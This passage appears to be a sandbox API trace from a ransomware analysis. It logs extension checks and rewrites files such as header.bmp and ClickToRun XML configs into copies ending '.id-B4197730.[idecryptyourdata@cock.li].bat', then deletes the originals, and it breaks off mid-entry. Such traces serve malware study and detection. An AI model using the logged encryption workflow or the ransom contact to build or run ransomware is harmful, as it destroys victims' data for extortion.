(lpString=".docx") returned 5 [0048.102] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.102] lstrlenW (lpString=".pdf") returned 4 [0048.102] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.102] lstrlenW (lpString=".xls") returned 4 [0048.102] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.102] lstrlenW (lpString=".xlsx") returned 5 [0048.102] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.102] lstrlenW (lpString=".ppt") returned 4 [0048.102] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.102] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.102] lstrlenW (lpString=".zip") returned 4 [0048.102] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.102] lstrlenW (lpString=".rar") returned 4 [0048.102] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.102] lstrlenW (lpString=".bz2") returned 4 [0048.102] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.102] lstrlenW (lpString=".7z") returned 3 [0048.103] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.103] lstrlenW (lpString=".dbf") returned 4 [0048.103] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.103] lstrlenW (lpString=".1cd") returned 4 [0048.103] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.103] lstrlenW (lpString=".jpg") returned 4 [0048.103] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.103] lstrlenW (lpString=".doc") returned 4 [0048.103] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString=".docx") returned 5 [0048.103] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.103] lstrlenW (lpString=".pdf") returned 4 [0048.103] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString=".xls") returned 4 [0048.103] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString=".xlsx") returned 5 [0048.103] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.103] lstrlenW (lpString=".ppt") returned 4 [0048.103] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.103] lstrlenW (lpString=".zip") returned 4 [0048.103] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.103] lstrlenW (lpString=".rar") returned 4 [0048.103] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString=".bz2") returned 4 [0048.103] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.103] lstrlenW (lpString=".7z") returned 3 [0048.103] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.103] lstrlenW (lpString=".dbf") returned 4 [0048.103] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.104] lstrlenW (lpString=".1cd") returned 4 [0048.104] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.104] lstrlenW (lpString=".jpg") returned 4 [0048.104] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.104] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0048.104] lstrlenW (lpString="header.bmp") returned 10 [0048.104] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0048.131] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=3628) returned 1 [0048.131] CloseHandle (hObject=0x2cc) returned 1 [0048.131] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 0x80 [0048.131] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.131] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0048.131] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.131] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.131] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0048.131] GetLastError () returned 0x0 [0048.131] ReadFile (in: hFile=0x2cc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xe2c, lpOverlapped=0x0) returned 1 [0049.513] WriteFile (in: hFile=0x2d0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe30, lpOverlapped=0x0) returned 1 [0049.514] ReadFile (in: hFile=0x2cc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0049.514] WriteFile (in: hFile=0x2d0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe8, lpOverlapped=0x0) returned 1 [0049.514] SetEndOfFile (hFile=0x2d0) returned 1 [0049.514] CloseHandle (hObject=0x2d0) returned 1 [0049.515] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.515] SetEndOfFile (hFile=0x2cc) returned 1 [0049.516] CloseHandle (hObject=0x2cc) returned 1 [0049.516] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0049.516] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 1 [0049.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.516] lstrlenW (lpString=".doc") returned 4 [0049.516] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0049.516] lstrlenW (lpString=".docx") returned 5 [0049.516] lstrcmpiW (lpString1=".docx", lpString2="r.bmp") returned -1 [0049.517] lstrlenW (lpString=".pdf") returned 4 [0049.517] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString=".xls") returned 4 [0049.517] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString=".xlsx") returned 5 [0049.517] lstrcmpiW (lpString1=".xlsx", lpString2="r.bmp") returned -1 [0049.517] lstrlenW (lpString=".ppt") returned 4 [0049.517] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.517] lstrlenW (lpString=".zip") returned 4 [0049.517] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString=".rar") returned 4 [0049.517] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString=".bz2") returned 4 [0049.517] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString=".7z") returned 3 [0049.517] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0049.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.517] lstrlenW (lpString=".dbf") returned 4 [0049.517] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.517] lstrlenW (lpString=".1cd") returned 4 [0049.517] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0049.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.517] lstrlenW (lpString=".jpg") returned 4 [0049.517] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.517] lstrlenW (lpString=".doc") returned 4 [0049.517] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString=".docx") returned 5 [0049.517] lstrcmpiW (lpString1=".docx", lpString2="r.bmp") returned -1 [0049.517] lstrlenW (lpString=".pdf") returned 4 [0049.517] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0049.517] lstrlenW (lpString=".xls") returned 4 [0049.517] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0049.518] lstrlenW (lpString=".xlsx") returned 5 [0049.518] lstrcmpiW (lpString1=".xlsx", lpString2="r.bmp") returned -1 [0049.518] lstrlenW (lpString=".ppt") returned 4 [0049.518] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0049.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.518] lstrlenW (lpString=".zip") returned 4 [0049.518] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0049.518] lstrlenW (lpString=".rar") returned 4 [0049.518] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0049.518] lstrlenW (lpString=".bz2") returned 4 [0049.518] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0049.518] lstrlenW (lpString=".7z") returned 3 [0049.518] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0049.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.518] lstrlenW (lpString=".dbf") returned 4 [0049.518] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0049.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.518] lstrlenW (lpString=".1cd") returned 4 [0049.518] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0049.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0049.518] lstrlenW (lpString=".jpg") returned 4 [0049.518] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0049.518] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0049.518] lstrlenW (lpString="updaterevokesipolicy.p7b") returned 24 [0049.518] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0053.999] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=4662) returned 1 [0053.999] CloseHandle (hObject=0x2c4) returned 1 [0053.999] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0053.999] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0053.999] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.999] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0053.999] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0053.999] lstrlenW (lpString=".doc") returned 4 [0054.000] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0054.000] lstrlenW (lpString=".docx") returned 5 [0054.000] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0054.000] lstrlenW (lpString=".pdf") returned 4 [0054.000] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0054.000] lstrlenW (lpString=".xls") returned 4 [0054.000] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0054.000] lstrlenW (lpString=".xlsx") returned 5 [0054.000] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0054.000] lstrlenW (lpString=".ppt") returned 4 [0054.000] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0054.000] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.000] lstrlenW (lpString=".zip") returned 4 [0054.000] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0054.000] lstrlenW (lpString=".rar") returned 4 [0054.000] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0054.000] lstrlenW (lpString=".bz2") returned 4 [0054.000] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0054.000] lstrlenW (lpString=".7z") returned 3 [0054.000] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0054.000] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.000] lstrlenW (lpString=".dbf") returned 4 [0054.000] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0054.000] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.000] lstrlenW (lpString=".1cd") returned 4 [0054.000] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0054.000] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.000] lstrlenW (lpString=".jpg") returned 4 [0054.000] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0054.000] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.000] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.000] lstrlenW (lpString=".doc") returned 4 [0054.000] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0054.000] lstrlenW (lpString=".docx") returned 5 [0054.001] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0054.001] lstrlenW (lpString=".pdf") returned 4 [0054.001] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0054.001] lstrlenW (lpString=".xls") returned 4 [0054.001] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0054.001] lstrlenW (lpString=".xlsx") returned 5 [0054.001] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0054.001] lstrlenW (lpString=".ppt") returned 4 [0054.001] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0054.001] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.001] lstrlenW (lpString=".zip") returned 4 [0054.001] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0054.001] lstrlenW (lpString=".rar") returned 4 [0054.001] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0054.001] lstrlenW (lpString=".bz2") returned 4 [0054.001] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0054.001] lstrlenW (lpString=".7z") returned 3 [0054.001] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0054.001] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.001] lstrlenW (lpString=".dbf") returned 4 [0054.001] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0054.001] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.001] lstrlenW (lpString=".1cd") returned 4 [0054.001] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0054.001] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0054.001] lstrlenW (lpString=".jpg") returned 4 [0054.001] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0054.001] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0054.001] lstrlenW (lpString="C2RHeartbeatConfig.xml") returned 22 [0054.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0054.002] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=4136) returned 1 [0054.002] CloseHandle (hObject=0x2c4) returned 1 [0054.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 0x20 [0054.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0054.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0054.002] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0054.002] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0054.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0054.003] GetLastError () returned 0x0 [0054.003] ReadFile (in: hFile=0x2c4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1028, lpOverlapped=0x0) returned 1 [0054.549] WriteFile (in: hFile=0x2e0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1030, lpOverlapped=0x0) returned 1 [0054.550] ReadFile (in: hFile=0x2c4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0054.550] WriteFile (in: hFile=0x2e0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x100, lpOverlapped=0x0) returned 1 [0054.551] SetEndOfFile (hFile=0x2e0) returned 1 [0054.551] CloseHandle (hObject=0x2e0) returned 1 [0054.552] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0054.552] SetEndOfFile (hFile=0x2c4) returned 1 [0054.552] CloseHandle (hObject=0x2c4) returned 1 [0054.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0054.553] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 1 [0054.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.553] lstrlenW (lpString=".doc") returned 4 [0054.553] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0054.553] lstrlenW (lpString=".docx") returned 5 [0054.553] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0054.553] lstrlenW (lpString=".pdf") returned 4 [0054.553] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0054.553] lstrlenW (lpString=".xls") returned 4 [0054.553] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0054.553] lstrlenW (lpString=".xlsx") returned 5 [0054.554] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0054.554] lstrlenW (lpString=".ppt") returned 4 [0054.554] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.554] lstrlenW (lpString=".zip") returned 4 [0054.554] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0054.554] lstrlenW (lpString=".rar") returned 4 [0054.554] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString=".bz2") returned 4 [0054.554] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString=".7z") returned 3 [0054.554] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.554] lstrlenW (lpString=".dbf") returned 4 [0054.554] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.554] lstrlenW (lpString=".1cd") returned 4 [0054.554] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.554] lstrlenW (lpString=".jpg") returned 4 [0054.554] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.554] lstrlenW (lpString=".doc") returned 4 [0054.554] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString=".docx") returned 5 [0054.554] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0054.554] lstrlenW (lpString=".pdf") returned 4 [0054.554] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0054.554] lstrlenW (lpString=".xls") returned 4 [0054.555] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0054.555] lstrlenW (lpString=".xlsx") returned 5 [0054.555] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0054.555] lstrlenW (lpString=".ppt") returned 4 [0054.555] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0054.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.555] lstrlenW (lpString=".zip") returned 4 [0054.555] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0054.555] lstrlenW (lpString=".rar") returned 4 [0054.555] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0054.555] lstrlenW (lpString=".bz2") returned 4 [0054.555] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0054.555] lstrlenW (lpString=".7z") returned 3 [0054.555] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0054.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.555] lstrlenW (lpString=".dbf") returned 4 [0054.555] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0054.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.555] lstrlenW (lpString=".1cd") returned 4 [0054.555] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0054.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0054.555] lstrlenW (lpString=".jpg") returned 4 [0054.555] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0054.555] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0054.555] lstrlenW (lpString="ServiceWatcherSchedule.xml") returned 26 [0054.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0054.556] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=4450) returned 1 [0054.556] CloseHandle (hObject=0x2c4) returned 1 [0054.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft 